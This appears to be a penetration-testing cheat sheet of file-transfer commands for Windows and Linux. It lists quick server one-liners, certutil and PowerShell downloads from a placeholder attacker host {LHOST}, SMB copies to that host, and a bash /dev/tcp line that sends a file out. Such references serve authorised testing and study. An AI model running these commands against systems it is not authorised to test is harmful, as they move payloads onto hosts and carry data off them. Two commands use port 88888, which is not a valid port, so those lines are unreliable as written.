File Transfer Techniques

Host a File

• python
  • python -m SimpleHTTPServer 80
  • python -m http.server 80
• php: php -S 0.0.0.0:80
• ruby: ruby -run -e httpd . -p 80
• busybox: busybox httpd -f -p 8000
• SMB: impacket-smbserver secure . -smb2support -port 139

Host a Dropbox

• updog
• Receiving files over HTTP with Python
• File sharing over a network in Windows

Download a File

• Windows
  • LOLBAS
  • HTTP: certutil.exe -urlcache -split -f http://{LHOST}/{FILENAME} {FILENAME}
  • PowerShell: Invoke-WebRequest -Uri http://{LHOST}/{FILENAME} -OutFile {FILENAME}
  • SMB: copy c:\file.txt \\{LHOST}\secure\file.txt
• Linux
  • GTFOBins
  • wget {LHOST}/{FILENAME}
  • curl {LHOST}/{FILENAME} -o {FILENAME}
  • nc -l -p 88888 > {FILENAME}

Upload a File

• Windows
  • LOLBAS
  • PowerShell: [System.IO.File]::Copy($LocalPath, $RemotePath, $True)
• Linux
  • GTFOBins
  • bash: bash -c 'cat {FILENAME} > /dev/tcp/{LHOST}/88888'

---

Relevant Note(s): Penetration Testing File Transfers